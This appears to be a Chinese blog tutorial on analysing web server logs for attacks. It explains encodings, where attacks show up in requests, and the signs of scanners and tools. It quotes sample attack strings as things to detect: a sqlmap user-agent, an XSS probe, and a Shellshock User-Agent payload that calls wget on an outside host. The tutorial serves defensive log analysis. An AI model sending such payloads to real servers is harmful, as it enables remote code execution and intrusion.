分析日志的流程

article/2025/8/20 23:28:26

Web日志分析常见方法工具

1.编码 某web日志
在这里插入图片描述

URL 编码 BASE64编码 16进制编码(以\x开头) utf-8编码
字符集 Unicode(以\u、\u+、&#x、&#开头),gb2312,gbk
2.利用解码工具
http://www.mxcz.net/tools/Hex.aspx(推荐)

该网站能够支持多种编码,包括base64、url、unicode、UTF-8、GB2312、GBK、16进制等
在这里插入图片描述

3.数据提交方式
GET . POST . COOKIE
在这里插入图片描述

在这里插入图片描述

4.还原日志
防火墙 :防火墙内置数据中心会记录数据包内容
态势感知:防火墙内置数据中心会记录数据包内容
中 的数据包内容 进行编码还原

URL编码还原
例:
POST /addnews.asp HTTP/1.1
title=%e5%b1%8c%e4%b8%9d%e7%9a%84%e9%80%86%e8%a2%ad
在这里插入图片描述
BASE64编码还原
例:
POST /addnews.asp HTTP/1.1
title=5bGM5Lid55qE6YCG6KKt==
在这里插入图片描述

如何分析日志

1.日志分析的目的
判断是否存在误判或漏盘 可以溯源攻击行为
分析NGAF和态势感知
2.攻击出现的位置
GET POST请求的 url/cookie/referer/user-agent 字段
post请求报文的表单字段
http应答页面
在这里插入图片描述

在这里插入图片描述

在这里插入图片描述
user-agent部分
恶意爬虫:Python-urllib/2.6、Baidu-YunGuanCe-ScanBot(ce.baidu.com)
扫描器:morfeus fucking scanner、Accept: acunetix/wvs
sql注入漏洞:sqlmap/1.0.8.15#dev (http://sqlmap.org)
xss攻击:’%22()%26%25<ScRiPt%20>prompt(961668)
其它非常特殊攻击 :User-Agent: () { :; }; /bin/mkdir -p /share/HDB_DATA/…/ && /usr/bin/wget -q -c http://lliillii.altervista.org/io.php 0<&1 2>&1

http报文负载
在这里插入图片描述

在http报文头部,出现了一些不应该出现的字段url和post表单,referer、cookie出现了sql语句、系统命令、脚本代码(js代码、php代码)一般都不正常 访问或者探测了一些敏感文件 应答报文可能泄露一些系敏感信息的
在这里插入图片描述

webshell一句话木马 eval post 等
在这里插入图片描述

配置文件 访问 (格式…/…/)
在这里插入图片描述

敏感目录探测的 特殊后缀
在这里插入图片描述

网站扫描 出现 user-agent 字段中
AWVS appscan sql注入 或 爬虫
在这里插入图片描述

3.攻击常见的特点
连续性 产生多条日志
攻击一般都会借助工具进行,同一个IP地址日志间隔较小,可能一秒中产生几条日志,明显不是人操作浏览器的行为。
攻击者可能会借助一定跳板,如果IP地址是国外的,攻击嫌疑较大。

4.攻击日志分析流程
a.基于攻击ip地址 方法 找出筛选出攻击源ip地址
就可以看出攻击者发起的攻击
b.基于攻击方法分析
查看语句明显的攻击行为 或 结合其他参数
源ip 攻击时间 日志频率 攻击位置
报文语义分析(比如访问admin文件夹)
c.一些网站实现存在安全隐患,用户的一些正常流量,也可以被攻击者篡改,直接发起攻击。
url参数传递sql语句 js脚本 …/目录穿越 调用系统函数 域名重定向


http://chatgpt.dhexx.cn/article/aZkDJb7d.shtml

相关文章

spooling技术和通道及实现打印机共享

spooling技术的作用&#xff1a; 1、spooling技术的引入是为了 缓和高速CPU和低速I/O设备之间的矛盾 &#xff1b; 2、spooling技术能够允许多台外部设备进行联机并发操作&#xff0c; 实现虚拟性 &#xff1b; 在这个技术中用到了缓冲区和通道&#xff0c;缓冲区大家都…

假脱机技术Spooling和守护进程

文章目录 假脱机系统Spooling和守护进程1.假脱机技术的引入2.SPOOling系统的组成3.SPOOling系统的工作过程守护进程 假脱机系统Spooling和守护进程 1.假脱机技术的引入 脱机技术&#xff1a; 为了缓和CPU的高速性与IO设备的低速性间的矛盾&#xff0c;而引入了脱机输入&#…

【操作系统】SPOOLing技术(外部设备联机并行操作/假脱机技术)

SPOOling技术便可将一台物理I/O设备虚拟为多台逻辑I/O设备&#xff0c;同样允许多个用户共享一台物理I/O设备&#xff08;生活中最常见的就是多台电脑共享同一个打印机&#xff09; 目的&#xff1a;为了缓和CPU的高速性与I/O设备低速性之间的矛盾而引入了脱机输入/输出技术。…

操作系统~假脱机SPOOLing技术与缓冲区管理

文章目录 什么是脱机技术假脱机技术—―输入/输出缓冲区共享打印机的实现原理缓冲区的管理缓冲区的工作过程单缓冲双缓冲循环缓冲区缓冲池 什么是脱机技术 在传统的批处理操作系统中, 我们将输入数据统一写到磁带中, 又将输出数据统一写到磁带中, 这就是一种脱机技术 Tips:为…

实验四 模拟SPOOLING技术

实验目的 通过设计一个SPOOLING假脱机输出的模拟程序&#xff0c;更好地理解和掌握SPOOLING假脱机技术.。 实验内容 1.设计一个实现SPOOLING技术的进程 设计一个SPOOLING输出进程和两个请求输出的用户进程。 当用户需要输出时&#xff0c;调用请求输出进程&#xff0c;将需…

输入输出管理:假脱机技术(SPOOLING)

假脱机技术 假脱机技术&#xff08;SPOOLING&#xff09;1.1 脱机技术1.2 假脱机技术1.3 假脱机技术的应用1.4 假脱机技术和缓冲的区别 假脱机技术&#xff08;SPOOLING&#xff09; 下图来自程序员cxuan IO软件层次结构 1.1 脱机技术 脱机处理是一种计算机技术&#xff0c;是…

操作系统实验--spooling技术

实验四 假脱机技术 一、目的和要求 1、目的 假脱机&#xff08;SPOOLING&#xff09;技术是广泛应用于各种计算机系统的一种行之有效的输入输出手段。这种技术使用比较简单的方法&#xff0c;缓和了高速处理机与低速输入输出设备速度不匹配的矛盾&#xff0c;提高了设备的利用率…

操作系统 | 实验七 SPOOLING技术

文章目录 一、实验目的二、实验内容三、数据结构3.1 数据结构3.2 函数以及功能 四、程序流程图五、实验代码六、实验结果七、实验体会总结 一、实验目的 理解和掌握SPOOLING假脱机技术 二、实验内容 通过SPOOLING技术可将一台物理I/O设备虚拟为多台逻辑I/O设备&#xff0c;同…

假脱机技术spooling技术 原理易懂!

原理&#xff1a; 在手工输入&#xff0c;没有操作系统的阶段&#xff0c;只能通过纸带机把程序员的代码读入&#xff0c;然后CPU需要直接与纸袋机交互&#xff0c;由于输入和输出的速度很慢&#xff0c;即使CPU的处理速度很快&#xff0c;但是在数据输入和输出的时候&#xf…

操作系统:SPOOLing技术(假脱机技术)

一、什么是脱机技术&#xff1f; 批处理阶段引入了脱机输入/输出技术&#xff08;用磁带完成&#xff09; 流程如下&#xff1a; 人——> 纸带机——> 外围控制机——>磁带机——>主机——>磁带机——>外围控制机——>纸带机——>人 ①在外围控制器的控…

操作系统第五章_03 假脱机技术 (SPOOLing技术)

&#x1f3eb;中北大学软件学院 &#x1f947; 文章目录 知识总览什么是脱机技术假脱机技术 —— 输入井和输出井共享打印机知识总览 知识总览 什么是脱机技术 为什么称为“脱机”——脱离主机的控制进行的输入/输出操作。 手工操作阶段&#xff1a;主机直接从 I/O设备获得数…

操作系统-设备管理-spooling技术

操作系统-设备管理-spooling技术 思考题&#xff1a;A,B,C,D共用一台打印机x&#xff0c;要进行资料打印时&#xff0c;很容易出现“打印机正在使用&#xff01;”,如何处理该问题&#xff1f; 我们在使用打印机的时候&#xff0c;可能会出现一种情况&#xff0c;就是我们的一…

聊聊SPOOLing技术

SPOOLing系统组成 由上所述得知&#xff0c;SPOOLing技术是对脱机输入、输出系统的模拟。相应地&#xff0c;SPOOLing系统必须建立在具有多道程序功能的操作系统上&#xff0c;而且还应有高速随机外存的支持&#xff0c;这通常是采用磁盘存储技术。 SPOOLing系统主要有以下三部…

spooling技术介绍

SPOOLing&#xff08;Simultaneous Peripheral Operation On-Line&#xff09;技术&#xff0c;即外部设备联机并行操作&#xff0c;是为实现低速输入输出设备与高速的主机之间的高效率数据交换而设计的。通常称为“假脱机技术”&#xff0c;又称为排队转储技术。  具体来说&…

操作系统的SPOOLING技术

SPOOLING技术&#xff08;Simultaneous Peripheral Operating On Line) 同时联机外围操作技术&#xff0c;它是关于慢速字符设备如何与计算机主机进行数据交换的一种技术&#xff0c;通常又称假脱机技术。 在多道程序环境下&#xff0c;利用多道程序中的一道或者两道程序来模拟…

SPOOLing技术的理解

最近在学习操作系统的SPOOLing技术&#xff0c;这篇博客作为一个学习的记录吧&#xff0c;供大家和我将来参考。 SPOOLing系统的组成 &#xff08;1&#xff09;输入井和输出井&#xff1a;输入井和输出井的存储区域是在磁盘上开辟出来的。输入输出井中的数据一般以文件的形式…

操作系统(SPOOLING技术)

SPOOKING技术 一、实验目的二、实验内容三、实验准备1、设计一个实现SPOOLING技术的进程2、设计进程调度算法3、进程状态4、数据结构5、编程说明6、程序框图 四、实验要求1、数据结构2、程序流程图代码运行结果 一、实验目的 理解和掌握SPOOLING假脱机技术 二、实验内容 通过S…

什么是业务对象?业务逻辑是什么?

业务对象通常被认为是代表实体&#xff0c;比如 或者存储的类。 这样的类具有一定的属性&#xff0c;比如价格&#xff0c;颜色&#xff0c;宽度&#xff0c;国际标准图书编号 等等. NET 地图( 对象地图中&#xff0c;它是由所谓的setter和 getter&#xff0c;换句话说&#xf…

【burpsuite安全练兵场-服务端5】业务逻辑漏洞-11个实验(全)

前言&#xff1a; 介绍&#xff1a; 博主&#xff1a;网络安全领域狂热爱好者&#xff08;承诺在CSDN永久无偿分享文章&#xff09;。 殊荣&#xff1a;CSDN网络安全领域优质创作者&#xff0c;2022年双十一业务安全保卫战-某厂第一名&#xff0c;某厂特邀数字业务安全研究员&…

三层架构之业务逻辑层

你好&#xff0c;是我琉忆。 今天我们讲一讲三层架构中的业务逻辑层 1、业务逻辑层的介绍 业务逻辑层&#xff08;Business Logic Layer&#xff0c;简称 BLL&#xff09;是系统架构中体现核心价值的部分。它的关注点主要集中在业务规则的制定、业务流程的实现等与业务需求有…